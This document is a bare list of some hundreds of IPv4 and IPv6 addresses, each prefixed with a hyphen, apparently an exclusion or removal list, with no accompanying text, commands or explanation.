-54.167.216.57 -23.244.241.165 -167.114.54.83 -178.79.173.65 -121.41.230.193 -121.40.77.222 -212.83.142.162 -45.76.163.113 -194.19.246.85 -115.28.100.74 -45.125.239.36 -142.91.95.163 -72.5.73.45 -123.207.86.56 -54.170.13.152 -114.215.187.38 -212.55.207.101 -172.106.184.17 -204.152.219.221 -211.155.235.76 -202.159.112.201 -134.19.136.23 -183.87.36.251 -142.91.95.16 -45.56.114.211 -104.236.57.71 -176.119.26.46 -69.16.236.149 -172.106.186.42 -178.33.113.119 -104.224.201.244 -173.212.212.216 -172.246.132.227 -178.18.215.91 -116.62.203.233 -212.84.163.134 -5.45.67.20 -91.192.155.245 -103.1.49.173 -138.68.138.211 -192.99.149.58 -94.23.168.164 -69.172.72.107 -123.60.202.199 -119.23.161.174 -74.201.40.6 -172.252.10.99 -139.59.242.222 -106.14.174.132 -182.254.229.245 -192.154.139.142 -58.59.7.158 -120.55.87.221 -80.233.244.32 -192.151.153.67 -117.74.136.102 -137.74.0.159 -146.185.143.161 -139.162.55.239 -173.192.54.106 -198.177.126.160 -142.4.201.156 -72.167.119.12 -156.235.168.58 -77.92.144.28 -59.110.139.222 -119.90.97.117 -220.233.151.13 -23.88.82.22 -54.38.110.25 -2a0a:7d80:1:9::98:13c -158.69.161.55 -159.148.37.105 -39.107.81.114 -50.62.133.42 -91.206.30.18 -188.166.179.130 -103.194.107.148 -2a0a:7d80:1:7::93:1fd -172.252.10.60 -45.63.12.220 -217.23.159.28 -77.92.144.18 -58.67.201.28 -194.106.198.62 -192.122.200.82 -54.183.93.232 -173.193.149.115 -104.203.82.182 -176.58.97.48 -172.252.10.51 -172.104.62.6 -190.248.152.35 -104.199.218.248 -54.172.172.255 -160.153.36.203 -2a0a:7d80:1:7::95:43 -68.232.185.86 -112.109.65.88 -23.244.241.17 -61.152.74.152 -115.159.23.161 -176.62.193.31 -18.221.187.206 -23.19.238.7 -103.205.1.98 -49.50.81.81 -128.199.132.75 -211.152.48.68 -50.18.142.149 -62.90.195.19 -70.36.125.34 -198.44.66.158 -46.252.19.21 -46.101.146.91 -109.199.241.162 -120.78.179.195 -58.137.174.165 -172.107.146.152 -122.9.229.137 -158.69.19.145 -199.241.191.147 -104.237.53.133 -185.163.100.45 -198.16.54.38 -69.87.199.3 -80.86.92.30 -103.200.16.5 -185.13.59.172 -106.14.143.71 -202.171.225.115 -104.167.11.173 -202.191.124.146 -183.81.152.122 -50.93.197.14 -156.237.177.173 -166.63.21.13 -218.245.3.108 -158.69.181.13 -171.9.117.97 -50.63.138.122 -91.217.202.5 -114.55.239.125 -113.105.222.46 -2a0a:7d80:1:7::105:20d -115.28.165.6 -153.122.3.99 -107.164.66.169 -139.199.9.224 -144.217.241.145 -120.77.251.212 -23.88.82.164 -139.59.160.42 -47.52.30.218 -87.98.241.78 -184.154.217.34 -212.83.149.127 -91.103.6.5 -65.49.9.156 -139.59.255.121 -64.6.104.122 -167.114.121.144 -193.70.101.226 -108.178.41.66 -119.81.89.155 -120.27.231.238 -95.85.9.167 -45.35.99.162 -174.140.140.36 -101.200.221.225 -121.40.23.193 -118.178.130.191 -92.51.180.119 -107.178.162.122 -45.77.14.202 -45.32.85.251 -125.88.108.29 -58.80.52.38 -92.222.35.138 -128.199.167.201 -23.110.61.75 -103.48.171.182 -119.23.150.74 -14.192.8.115 -182.92.192.145 -184.107.230.78 -5.45.79.142 -123.56.155.26 -104.238.167.61 -159.148.20.111 -178.33.66.65 -110.10.40.217 -159.148.20.123 -150.95.134.32 -194.15.124.236 -52.206.144.248 -103.12.51.3 -218.92.227.219 -108.61.96.18 -122.9.15.12 -47.52.28.51 -218.245.64.179 -163.44.171.63 -121.42.165.178 -219.140.177.115 -149.202.240.163 -39.108.103.21 -45.32.77.76 -114.215.17.235 -198.58.80.113 -150.95.149.31 -182.92.243.152 -188.225.33.90 -116.206.179.169 -107.150.49.212 -45.56.113.46 -163.172.154.112 -67.211.40.52 -142.91.95.89 -194.19.246.119 -47.93.0.81 -120.24.249.65 -218.145.65.53 -218.75.241.166 -85.254.126.73 -23.104.135.189 -138.68.75.252 -123.207.92.212 -198.58.80.89 -46.53.160.207 -121.40.88.184 -103.198.45.16 -60.205.185.232 -93.115.31.36 -166.63.21.93 -47.92.138.195 -185.163.100.148 -1.226.200.57 -81.173.99.200 -182.253.110.86 -112.117.62.90 -104.200.24.133 -47.104.158.106 -122.14.199.82 -58.83.197.22 -115.124.75.189 -23.225.0.89 -104.237.139.139 -183.134.4.150 -54.90.68.183 -212.68.42.52 -155.230.54.42 -176.34.252.26 -111.231.20.29 -52.192.48.89 -121.201.0.70 -210.5.104.90 -114.242.215.34 -23.224.115.216 -69.36.242.135 -212.83.143.185 -209.239.122.138 -84.39.239.104 -190.9.37.168 -137.74.60.220 -45.35.102.161 -109.201.155.168 -192.241.139.164 -216.17.111.212 -34.229.156.1 -45.122.253.247 -65.99.240.178 -156.67.218.185 -177.154.192.8 -198.199.126.140 -154.85.252.69 -192.154.100.46 -60.190.91.210 -138.197.5.231 -119.81.107.167 -216.17.99.77 -124.236.110.83 -2a0a:7d80:1:7::106:231 -222.233.54.25 -118.178.90.33 -185.129.171.25 -152.66.71.111 -39.108.100.67 -185.181.228.118 -133.242.201.138 -121.40.105.97 -46.105.184.250 -184.73.179.40 -107.178.147.87 -45.64.170.232 -188.226.223.218 -35.177.42.176 -122.14.216.24 -85.95.241.202 -161.202.163.13 -23.228.73.230 -86.104.177.23 -185.131.50.86 -62.213.100.237 -47.92.81.179 -54.152.203.5 -120.26.36.177 -86.104.177.38 -93.114.66.23 -103.91.126.37 -23.19.202.44 -132.148.26.170 -172.255.159.204 -218.57.15.102 -114.55.1.45 -159.203.61.227 -64.15.134.1 -178.218.212.74 -218.85.135.184 -62.75.148.158 -142.91.95.80 -173.193.149.99 -87.98.134.99 -200.129.128.22 -203.171.227.217 -120.77.170.24 -80.233.244.29 -128.199.232.67 -113.20.30.205 -5.196.196.173 -23.225.89.24 -1.179.138.91 -188.226.144.192 -172.246.47.102 -104.236.176.186 -185.233.130.245 -115.236.100.19 -119.84.84.188 -2a01:7e00::f03c:91ff:fe73:cabd -192.96.206.139 -103.237.144.101 -103.100.157.222 -101.37.174.239 -54.238.255.246 -193.25.100.166 -120.55.74.42 -47.52.203.184 -153.125.234.58 -114.215.188.200 -77.48.10.130 -31.154.69.236 -100.42.62.67 -118.99.51.42 -164.52.150.240 -210.16.120.151 -185.163.100.178 -121.199.24.207 -166.62.116.53 -54.196.18.115 -223.95.88.52 -5.135.72.112 -116.236.231.184 -2a0a:7d80:1:7::106:10e -65.60.61.207 -182.92.198.39 -23.104.135.179 -46.105.158.54 -185.26.182.101 -46.229.165.91 -112.74.97.181 -115.159.113.211 -106.75.137.201 -23.110.47.234 -159.253.44.211 -188.165.251.16 -54.209.194.34 -113.247.228.69 -178.33.255.90 -173.199.116.24 -121.201.60.182 -202.181.132.165 -137.74.162.208 -109.123.113.160 -117.34.73.245 -119.23.50.71 -169.255.68.149 -5.101.3.170 -182.92.239.233 -146.185.132.19 -67.23.241.21 -69.164.217.165 -87.98.162.71 -145.239.74.143 -103.9.189.133 -51.255.1.180 -203.194.144.244 -139.162.231.163 -123.57.11.79 -188.125.162.210 -122.9.163.209 -210.21.215.70 -184.173.221.179 -107.189.60.58 -150.95.155.242 -37.58.110.122 -114.113.126.213 -123.57.90.87 -37.187.65.94 -122.9.235.214 -72.46.99.20 -144.217.71.183 -60.253.103.68 -208.167.252.5 -84.54.97.89 -103.74.121.188 -116.255.245.151 -153.122.86.9 -23.225.0.197 -5.45.72.27 -105.184.56.110 -103.53.76.19 -200.228.194.2 -198.58.80.99 -1.226.200.187 -58.82.244.236 -94.124.95.70 -211.149.154.148 -216.75.8.50 -118.190.174.222 -118.190.105.190 -112.82.144.216 -139.162.106.249 -172.246.220.133 -5.196.183.135 -23.92.18.78 -5.189.169.203 -122.192.163.73 -209.151.166.232 -205.186.128.105 -13.231.143.64 -192.186.175.83 -89.40.218.4 -117.117.118.38 -120.92.51.139 -172.110.6.34 -137.74.167.46 -103.205.96.233 -185.164.138.206 -208.110.80.30 -162.243.207.247 -121.196.196.30 -156.67.216.203 -185.12.111.132 -121.40.66.6 -203.195.198.23 -39.108.146.84 -45.76.185.38 -167.114.185.148 -211.99.229.59 -211.99.229.59 -62.149.14.87 -58.133.250.65 -185.124.84.234 -119.29.78.116 -221.150.100.100 -95.85.21.162 -138.197.110.209 -45.55.173.92 -62.75.168.80 -54.251.60.57 -198.50.191.105 -54.162.105.227 -188.165.18.136 -118.190.117.167 -119.15.124.213 -109.74.134.211 -82.196.6.240 -107.174.204.130 -120.25.221.205 -119.29.117.206 -37.59.81.67 -37.59.76.116 -149.202.36.57 -87.106.58.11 -2a0a:7d80:1:7::97:22f -23.104.135.215 -47.93.46.77 -150.95.153.82 -34.227.112.208 -54.86.124.196 -45.76.155.83 -23.110.61.120 -118.244.214.182 -150.95.147.49 -221.232.145.30 -144.217.212.28 -173.236.78.91 -108.61.23.251 -149.56.36.185 -46.41.129.141 -62.63.191.40 -43.231.7.154 -188.226.131.201 -144.217.163.122 -52.26.97.67 -23.225.89.235 -45.61.115.14 -23.104.135.222 -107.182.166.100 -212.129.10.118 -89.108.93.77 -192.99.11.21 -103.28.38.49 -46.105.56.251 -198.200.41.74 -156.237.178.133 -47.93.9.181 -23.238.166.145 -212.218.19.21 -198.200.41.87 -45.117.83.156 -54.248.111.7 -23.225.0.35 -77.223.145.184 -45.35.102.187 -108.170.62.172 -85.93.93.10 -173.255.225.239 -149.210.143.131 -184.173.25.56 -220.181.86.19 -217.147.169.152 -104.236.13.210 -46.254.18.188 -103.12.50.20 -45.32.112.87 -166.62.35.116 -185.83.145.37 -45.114.118.220 -23.234.6.27 -198.50.199.241 -185.12.111.184 -185.50.178.145 -67.227.213.165 -125.62.20.50 -45.77.157.99 -103.239.28.92 -164.132.90.165 -45.32.50.116 -94.23.86.116 -101.53.137.91 -47.96.8.6 -178.57.220.74 -104.131.95.35 -5.150.254.48 -123.207.154.212 -47.94.249.87 -45.77.40.44 -131.0.232.14 -185.136.205.108 -123.56.68.149 -86.104.177.121 -213.189.63.207 -123.207.41.83 -217.174.253.248 -184.173.101.82 -198.50.237.201 -185.12.111.101 -222.122.17.150 -139.59.78.115 -23.244.241.190 -203.155.20.146 -115.28.34.47 -47.90.14.229 -78.128.79.9 -23.110.61.122 -60.12.111.89 -5.178.109.73 -51.15.39.235 -184.95.53.28 -192.241.170.246 -23.110.56.72 -108.160.158.58 -122.9.229.141 -120.76.160.1 -185.122.140.87 -82.135.151.60 -66.135.60.177 -150.95.144.64 -168.235.76.72 -219.234.4.103 -185.92.72.96 -218.50.190.3 -109.237.108.168 -45.61.115.52 -188.165.209.194 -103.74.121.153 -85.254.126.89 -202.149.67.140 -188.165.197.191 -212.83.175.64 -51.255.140.245 -89.163.129.144 -184.107.164.60 -210.213.231.3 -144.217.65.149 -122.114.45.19 -202.102.95.20 -115.159.227.69 -213.152.165.74 -52.179.101.143 -67.227.211.219 -46.105.96.9 -109.169.86.88 -198.251.87.3 -54.151.255.59 -208.167.226.42 -150.95.183.82 -211.149.221.28 -5.196.139.216 -192.169.202.107 -50.23.78.210 -142.4.205.51 -101.132.141.167 -142.4.192.238 -188.165.139.101 -103.28.38.249 -185.231.71.231 -159.203.22.56 -110.189.31.153 -52.68.59.34 -23.110.61.67 -159.148.13.150 -139.199.61.29 -138.197.220.206 -60.251.83.157 -23.244.241.59 -87.118.120.103 -115.29.102.151 -139.162.97.236 -104.245.33.12 -88.99.165.109 -120.132.48.209 -2600:3c03::f03c:91ff:fedb:e36a -176.28.2.7 -67.225.189.80 -121.40.37.15 -93.115.31.77 -97.74.4.46 -43.241.235.186 -158.85.30.86 -133.130.110.137 -37.139.3.9 -122.114.42.178 -83.99.251.108 -212.129.43.223 -115.238.21.152 -172.104.52.197 -51.255.95.111 -166.63.21.5 -184.95.36.84 -23.225.0.83 -54.179.183.24 -211.136.83.111 -109.201.146.67 -5.39.121.99 -180.97.215.162 -93.188.164.140 -142.4.103.123 -194.19.246.118 -23.104.135.74 -103.74.121.190 -192.95.3.45 -23.238.176.197 -103.49.214.226 -47.52.24.15 -23.244.241.34 -103.12.51.12 -172.246.220.203 -114.215.237.24 -133.130.97.158 -210.210.155.18 -149.56.196.220 -23.89.145.235 -119.29.59.207 -23.238.145.76 -188.215.245.224 -114.55.36.60 -122.9.22.171 -219.129.237.176 -66.39.5.47 -184.164.143.228 -47.94.191.231 -119.23.255.124 -206.190.153.5 -139.129.109.137 -91.121.58.249 -103.240.213.50 -23.244.241.13 -115.159.27.49 -45.119.81.136 -23.111.148.103 -83.218.240.251 -58.117.128.124 -188.252.69.124 -47.96.28.26 -94.23.75.130 -54.196.31.78 -120.25.104.31 -173.212.247.16 -91.221.99.156 -216.17.100.21 -5.8.64.21 -35.160.17.62 -213.180.83.52 -23.229.12.172 -120.197.41.8 -156.235.170.29 -188.226.145.112 -121.40.244.231 -188.165.201.133 -118.107.176.39 -38.135.32.164 -85.25.74.104 -13.72.78.96 -62.249.141.202 -23.19.22.12 -103.12.155.28 -52.87.142.43 -115.159.52.100 -91.121.226.229 -113.33.38.240 -64.65.27.85 -192.241.117.103 -23.110.61.68 -182.16.49.107 -132.148.20.137 -104.193.68.218 -109.203.103.161 -188.165.209.15 -172.246.220.135 -204.93.61.70 -178.33.15.83 -185.70.96.14 -103.210.238.201 -60.12.111.79 -104.130.194.16 -64.235.53.102 -69.64.77.64 -132.248.142.9 -114.215.241.137 -123.206.100.126 -151.80.101.67 -23.110.47.206 -107.165.201.60 -150.95.155.226 -172.246.220.124 -172.252.10.147 -120.138.30.167 -124.109.20.116 -108.59.249.14 -172.255.159.203 -198.2.212.186 -217.145.92.14 -139.196.204.176 -136.0.69.84 -123.60.202.214 -101.255.17.228 -80.249.160.207 -58.19.228.116 -74.52.4.37 -2a0a:7d80:1:7::91:1ae -5.196.220.168 -134.119.112.243 -45.55.63.228 -218.1.109.21 -212.68.46.62 -149.56.128.53 -198.16.81.10 -108.171.216.203 -116.62.18.119 -31.28.27.26 -218.232.75.146 -106.14.120.129 -156.235.170.2 -173.236.78.69 -122.9.18.162 -134.119.38.127 -54.251.35.36 -161.58.185.205 -185.2.102.251 -47.93.54.31 -142.4.107.248 -172.246.220.50 -80.79.30.14 -5.196.140.59 -133.130.101.68 -168.235.86.7 -5.178.109.130 -185.49.22.12 -188.225.47.225 -156.67.217.131 -64.131.72.120 -114.215.198.0 -173.0.63.175 -121.199.11.209 -212.154.242.90 -45.32.42.172 -195.88.35.55 -111.90.141.52 -37.123.99.68 -1.255.109.120 -46.166.130.96 -119.110.79.202 -149.202.113.249 -158.85.225.2 -23.244.241.28 -45.76.160.155 -54.248.72.184 -51.254.19.251 -222.233.54.6 -87.117.230.249 -172.107.75.251 -184.154.202.149 -142.91.95.236 -204.44.66.10 -103.100.157.70 -188.166.69.39 -188.165.233.149 -118.184.21.231 -121.201.0.120 -112.74.91.89 -103.24.244.205 -114.215.127.130 -47.52.248.223 -192.186.173.247 -69.30.55.147 -121.42.151.201 -45.77.41.73 -107.178.147.124 -212.84.163.138 -23.104.135.230 -118.97.122.134 -123.207.3.214 -174.139.33.119 -34.209.129.84 -159.203.44.232 -172.107.64.43 -119.29.164.89 -211.72.246.170 -138.68.127.125 -54.246.86.29 -103.43.45.93 -91.201.117.252 -94.23.99.198 -92.53.100.197 -104.202.185.210 -149.71.97.60 -122.144.13.107 -123.138.89.60 -38.242.18.23 -200.113.174.198 -47.92.65.5 -45.79.165.109 -151.80.151.25 -172.107.147.52 -60.12.147.95 -46.105.120.9 -198.23.196.64 -46.101.229.37 -184.107.194.29 -183.60.195.205 -23.244.241.172 -185.112.156.196 -111.225.223.69 -193.1.175.79 -2a0a:7d80:1:7::105:19a -205.251.138.126 -192.151.155.195 -198.251.67.124 -120.26.42.90 -172.246.220.5 -37.187.212.155 -142.91.239.76 -23.244.241.68 -211.149.190.144 -125.212.243.149 -122.114.43.243 -91.142.209.34 -124.243.223.26 -103.250.94.230 -107.161.169.162 -208.83.63.213 -120.25.87.59 -190.210.182.121 -142.91.232.123 -211.157.24.149 -182.16.121.52 -208.51.62.98 -72.52.219.101 -122.9.5.35 -23.104.135.81 -151.80.172.58 -178.33.251.103 -62.138.142.10 -103.240.214.194 -61.160.200.210 -120.25.70.161 -2a0a:7d80:1:7::91:1ea -202.56.13.87 -58.64.175.237 -122.9.18.171 -188.166.94.50 -184.172.26.162 -103.240.214.63 -114.215.236.44 -43.230.201.72 -67.23.255.213 -139.129.203.71 -185.13.58.75 -51.254.5.218 -77.81.245.158 -136.0.69.68 -192.69.219.12 -122.9.235.227 -70.36.125.35 -86.106.82.51 -117.34.47.37 -45.199.23.174 -194.19.246.66 -85.185.91.199 -2600:3c01::f03c:91ff:fe98:952a -108.170.59.220 -139.162.76.129 -185.13.57.73 -107.178.162.68 -114.215.143.226 -69.61.64.171 -54.199.155.55 -221.200.117.103 -62.210.229.18 -191.242.248.38 -107.165.201.147 -185.175.208.184 -65.99.240.179 -204.11.236.210 -182.16.92.133 -120.24.240.149 -23.224.115.77 -114.55.109.18 -2a0a:7d80:1:7::106:ba -222.239.79.91 -45.76.181.74 -172.255.159.241 -142.91.241.125 -158.69.131.209 -185.209.139.23 -122.49.30.13 -107.22.172.151 -58.225.56.185 -45.76.145.146 -2a01:4f8:202:616a::2 -198.58.80.85 -104.202.185.146 -210.16.120.120 -107.179.93.54 -150.95.183.110 -103.240.213.115 -172.252.10.169 -136.0.69.6 -91.121.107.7 -107.191.99.85 -178.33.36.105 -178.208.81.120 -139.99.105.106 -103.44.145.246 -50.28.1.147 -176.56.231.198 -37.59.146.69 -198.176.54.12 -118.178.180.251 -104.224.203.158 -199.167.40.36 -45.55.208.178 -192.175.118.170 -185.157.211.14 -123.57.22.226 -94.16.120.12 -112.74.168.180 -150.95.148.189 -199.217.117.47 -122.9.22.132 -185.103.219.55 -117.41.235.129 -144.76.85.243 -23.95.80.51 -103.12.49.33 -173.236.50.115 -5.196.148.212 -204.197.240.43 -217.146.76.167 -104.149.66.168 -202.141.239.243 -54.235.155.13 -101.200.201.177 -173.245.89.203 -103.13.222.106 -121.119.178.66 -119.29.225.148 -206.190.153.80 -103.240.214.89 -23.238.129.81 -164.132.148.101 -47.93.102.251 -188.226.235.233 -165.231.3.220 -50.116.51.103 -188.165.177.20 -95.213.196.19 -211.159.157.172 -139.162.89.90 -172.104.239.117 -47.92.67.154 -23.224.115.26 -82.151.120.196 -23.230.19.238 -119.29.59.141 -2a0a:7d80:1:7::101:2ea -23.238.176.194 -122.9.229.148 -122.9.163.239 -23.88.82.205 -66.254.177.69 -2001:4801:7817:72:be76:4eff:fe11:7f43 -148.77.83.211 -45.32.181.65 -91.98.28.189 -162.243.218.122 -23.88.82.175 -69.164.199.178 -61.240.150.182 -159.148.13.130 -108.61.221.180 -150.95.133.206 -120.25.123.231 -92.222.179.192 -194.19.246.126 -198.44.165.12 -59.63.166.116 -193.23.181.187 -121.199.3.194 -192.241.226.193 -23.238.145.118 -91.214.110.53 -117.78.36.18 -38.128.113.87 -47.95.32.232 -194.19.246.5 -112.109.90.67 -54.173.175.219 -146.185.147.185 -121.43.162.30 -82.202.176.201 -104.250.135.3 -220.73.45.241 -62.63.190.26 -203.113.38.228 -180.179.212.244 -45.32.108.210 -111.202.15.38 -202.168.148.140 -213.83.131.108 -118.31.187.65 -107.179.102.202 -137.74.35.44 -208.96.162.253 -5.45.125.36 -46.105.99.202 -139.162.59.83 -88.99.105.117 -133.130.107.69 -188.68.241.253 -2606:1880:3:11::7 -103.58.148.101 -82.135.149.40 -23.225.0.79 -107.179.93.62 -185.190.104.177 -46.105.73.5 -107.164.66.229 -80.190.190.124 -128.199.254.88 -104.223.47.82 -149.56.151.152 -91.142.209.74 -49.50.67.228 -49.50.118.13 -137.74.93.163 -83.172.35.6 -60.18.162.39 -69.175.106.114 -118.190.60.19 -188.166.10.31 -195.144.70.221 -134.0.116.20 -116.62.188.234 -112.124.101.181 -124.243.223.21 -120.26.51.193 -119.29.55.220 -142.54.178.18 -115.126.100.12 -23.19.22.33 -97.69.180.65 -62.63.190.11 -47.93.15.187 -121.40.135.151 -93.191.132.223 -23.88.82.9 -23.225.89.198 -103.244.2.44 -2605:6280:1:d::42 -114.113.153.141 -185.71.65.9 -42.51.192.235 -198.23.88.84 -133.130.112.130 -122.9.229.151 -136.0.69.212 -2600:3c01::f03c:91ff:fe89:34c7 -172.106.186.4 -162.247.232.94 -49.212.197.206 -218.17.100.53 -88.214.242.118 -119.29.3.39 -146.71.124.204 -103.48.82.121 -47.88.193.195 -51.254.233.120 -107.178.162.104 -103.10.145.10 -188.166.162.56 -151.80.172.10 -59.110.27.129 -34.245.6.102 -5.45.84.178 -103.250.94.227 -125.208.8.70 -107.178.149.67 -94.23.176.84 -23.95.128.195 -114.115.156.163 -114.215.128.174 -87.245.178.231 -124.243.223.38 -133.130.107.224 -178.32.212.111 -103.12.49.12 -184.173.138.253 -207.148.78.217 -188.42.237.82 -114.55.7.121 -80.84.230.39 -87.98.173.229 -174.142.54.12 -45.77.246.167 -169.50.165.115 -78.128.216.77 -103.6.246.19 -123.176.101.115 -208.94.238.34 -139.224.67.154 -172.106.186.18 -172.107.147.45 -198.50.238.65 -172.252.10.199 -37.59.15.99 -50.115.137.1 -120.25.203.102 -103.240.212.57 -103.240.212.96 -54.37.142.63 -156.235.170.27 -188.166.218.90 -104.131.151.252 -95.163.78.235 -192.99.109.20 -107.170.238.148 -88.247.58.20 -121.201.66.128 -208.167.225.109 -168.187.151.117 -107.187.204.43 -185.96.4.88 -84.19.190.148 -23.225.113.188 -163.172.108.239 -119.81.5.168 -218.61.195.228 -59.110.241.40 -70.36.125.51 -91.93.43.27 -119.75.231.132 -62.12.115.22 -123.56.200.193 -23.225.113.191 -146.185.168.202 -193.70.71.54 -104.202.185.11 -83.238.246.172 -47.52.238.216 -122.9.163.254 -83.247.63.6 -172.106.187.253 -89.145.103.141 -133.242.145.27 -188.226.254.234 -5.45.74.60 -104.224.198.172 -114.215.139.80 -172.246.220.84 -62.44.201.74 -107.190.135.157 -71.19.249.106 -104.232.102.161 -162.243.229.166 -23.225.89.207 -166.63.21.46 -116.236.231.187 -103.198.45.52 -103.240.212.132 -121.40.55.196 -183.63.252.153 -182.255.2.68 -62.168.117.239 -91.121.53.35 -183.61.5.53 -45.77.169.251 -45.79.145.253 -62.138.205.67 -185.102.184.26 -60.191.96.59 -120.204.198.101 -199.188.206.138 -37.48.125.53 -172.246.220.169 -209.87.149.59 -198.200.41.12 -13.112.223.103 -115.71.243.135 -133.242.201.140 -188.226.216.33 -23.19.237.30 -139.129.97.15 -67.229.58.239 -78.153.150.28 -163.44.170.85 -107.187.199.110 -194.19.246.90 -173.212.252.40 -185.207.207.14 -23.253.175.85 -203.153.97.51 -41.77.115.205 -120.76.204.3 -150.95.140.34 -123.59.84.213 -66.23.230.178 -133.130.119.112 -172.246.196.131 -180.130.166.155 -62.100.206.100 -5.135.221.134 -91.220.196.115 -208.167.225.230 -139.196.232.152 -37.187.76.150 -2a0a:7d80:1:9::99:32d -23.88.82.71 -123.207.58.13 -2a0a:7d80:1:7::102:3b -133.242.22.112 -216.241.17.91 -103.240.213.184 -183.61.81.201 -2a0a:7d80:1:7::101:1db -104.200.28.148 -45.64.187.177 -107.178.147.84 -52.77.170.83 -137.74.17.121 -208.92.165.5 -103.48.82.26 -50.97.149.34 -52.29.158.195 -2a0a:7d80:1:7::92:37 -162.144.41.19 -156.235.169.2 -45.61.113.43 -120.24.7.159 -104.238.221.82 -38.128.113.57 -52.87.190.237 -2001:e42:102:1538:160:16:125:140 -92.240.245.83 -68.68.104.230 -107.165.201.102 -144.217.65.231 -120.31.129.76 -91.194.84.48 -118.140.42.66 -35.177.161.11 -23.225.89.150 -76.74.151.216 -51.255.39.236 -208.83.62.18 -69.42.50.138 -103.28.38.223 -221.130.201.240 -64.207.144.80 -89.105.218.47 -198.255.108.52 -172.255.173.177 -178.172.172.81 -142.91.239.99 -185.66.69.98 -54.169.80.44 -208.83.61.51 -107.187.199.122 -23.225.113.152 -222.255.28.51 -103.100.157.156 -208.53.61.203 -2600:3c01::f03c:91ff:fe89:ced3 -123.56.66.17 -37.139.31.201 -34.228.54.19 -91.198.44.22 -91.142.212.72 -216.104.35.75 -107.187.41.92 -199.204.21.76 -120.26.92.171 -107.6.221.124 -188.132.147.11 -112.74.95.211 -164.52.150.248 -192.154.213.237 -78.110.61.58 -169.57.10.72 -106.38.223.76 -171.11.140.67 -212.71.239.94 -192.99.190.173 -104.202.185.110 -125.253.127.124 -43.240.14.24 -91.199.178.47 -5.178.109.176 -45.124.85.78 -103.96.140.21 -113.107.188.154 -132.248.6.21 -45.35.163.121 -23.110.56.79 -45.35.163.76 -162.244.80.215 -194.19.246.8 -163.172.232.95 -159.89.224.218 -75.126.175.59 -185.13.59.185 -23.225.239.110 -103.56.207.231 -221.231.7.10 -58.215.29.230 -139.129.212.174 -80.233.244.79 -83.167.242.175 -82.202.213.148 -51.254.153.96 -210.65.151.141 -5.178.109.164 -204.15.194.213 -222.255.122.166 -203.128.246.151 -23.19.237.35 -119.29.171.106 -198.24.128.29 -103.233.146.93 -91.224.214.76 -109.232.221.72 -195.182.150.10 -156.235.172.73 -103.59.166.122 -185.205.61.22 -117.18.0.110 -172.246.196.154 -202.105.232.16 -23.225.113.92 -107.178.149.74 -107.187.192.134 -142.44.183.100 -45.35.163.225 -122.114.36.102 -172.252.10.58 -45.32.207.141 -200.145.2.32 -188.132.205.102 -142.91.243.88 -103.37.235.254 -117.27.138.185 -108.168.174.121 -52.128.224.101 -217.23.6.229 -213.192.74.106 -91.224.194.63 -107.165.201.11 -218.32.216.250 -126.74.192.55 -107.161.17.77 -185.134.173.107 -172.107.75.241 -149.202.123.5 -85.25.37.201 -69.65.56.188 -54.243.134.14 -2.89.163.141 -138.197.70.63 -199.182.173.13 -23.234.43.15 -136.0.69.106 -208.94.67.179 -23.19.237.42 -188.165.133.120 -146.185.137.162 -178.62.147.114 -122.9.27.102 -178.132.43.236 -160.114.96.228 -47.92.117.76 -51.254.23.80 -104.236.202.62 -182.16.163.251 -131.94.123.106 -164.132.4.140 -159.148.37.108 -172.246.220.67 -120.92.226.1 -121.40.98.102 -112.82.144.217 -80.233.141.154 -107.151.76.141 -125.253.127.108 -108.171.178.7 -64.251.26.175 -47.100.161.129 -45.35.163.74 -159.148.37.103 -103.240.214.84 -202.84.46.114 -103.243.94.234 -210.129.170.27 -218.93.208.232 -184.173.138.245 -103.240.213.72 -103.245.225.150 -185.4.227.114 -177.69.103.162 -124.173.123.34 -138.201.204.47 -121.40.216.79 -103.240.212.43 -94.232.145.9 -59.188.87.155 -123.31.26.66 -116.68.195.58 -23.88.82.203 -120.25.68.87 -154.85.181.130 -54.200.202.198 -180.178.44.38 -103.45.105.74 -40.71.172.230 -222.255.175.190 -104.237.2.93 -185.122.140.99 -47.94.230.153 -2a0a:7d80:1:7::106:1b6 -103.240.213.111 -172.107.64.11 -159.8.13.47 -165.231.3.221 -103.198.45.35 -69.50.208.150 -23.19.238.57 -5.178.109.198 -103.12.49.10 -142.91.241.80 -176.31.36.207 -212.87.230.9 -185.13.56.67 -195.20.199.238 -142.4.103.112 -2a0a:7d80:1:7::96:8c -45.252.248.246 -156.237.176.220 -125.253.127.14 -2a01:7e00::f03c:91ff:fee4:8245 -123.30.50.119 -47.93.126.47 -218.240.154.8 -103.240.213.180 -54.162.90.237 -96.8.117.240 -139.162.50.111 -88.208.239.14 -210.142.80.41 -5.10.66.131 -123.57.167.72 -66.55.140.53 -66.55.156.143 -198.13.122.228 -107.151.113.211 -203.90.82.75 -208.94.67.180 -172.255.173.227 -39.106.191.5 -5.178.109.71 -47.93.62.163 -185.205.61.24 -123.157.24.106 -120.204.195.144 -45.35.163.61 -103.205.3.91 -5.178.109.18 -108.61.149.26 -82.135.151.118 -172.104.82.56 -206.245.174.110 -87.110.184.50 -199.30.246.150 -199.180.155.187 -46.137.169.23 -121.40.149.114 -180.178.59.110 -50.62.58.122 -208.94.67.178 -103.90.220.148 -45.35.163.43 -23.230.19.180 -172.247.51.107 -23.253.229.186 -67.23.127.183 -188.166.191.23 -103.48.82.118 -81.171.34.70 -93.115.31.72 -122.9.15.22 -137.74.59.236 -58.82.245.204 -217.182.175.146 -122.53.126.20 -59.151.1.132 -192.122.200.241 -192.122.200.249 -85.15.214.20 -172.252.10.91 -103.90.220.89 -180.180.217.36 -114.215.180.231 -185.153.197.89 -103.55.1.168 -103.90.220.87 -136.0.69.25 -134.119.38.123 -67.205.145.194 -23.94.191.178 -59.42.255.215 -134.119.11.225 -182.254.228.219 -13.124.237.244 -196.196.25.92 -202.9.100.176 -203.162.247.123 -203.162.166.97 -203.162.166.73 -139.162.50.224 -98.126.34.186 -98.142.108.27 -91.214.169.212 -23.19.22.41 -109.95.211.45 -82.163.78.169 -169.54.214.73 -112.74.202.94 -124.243.223.12 -118.98.234.96 -89.252.40.29 -23.238.176.253 -192.81.211.160 -91.224.194.55 -101.200.204.213 -122.9.163.207 -45.35.163.144 -192.186.14.108 -104.224.200.254 -136.0.69.238 -103.240.213.235 -162.247.234.88 -202.171.225.138 -218.93.207.231 -123.57.161.210 -13.115.100.236 -178.33.161.65 -125.212.220.180 -103.84.90.177 -107.178.150.112 -172.247.51.135 -124.107.130.190 -163.172.24.221 -94.23.86.74 -120.78.197.209 -91.198.44.215 -107.180.84.138 -80.65.65.217 -177.234.150.174 -62.138.14.120 -23.110.61.78 -23.95.113.186 -23.19.202.32 -31.220.108.99 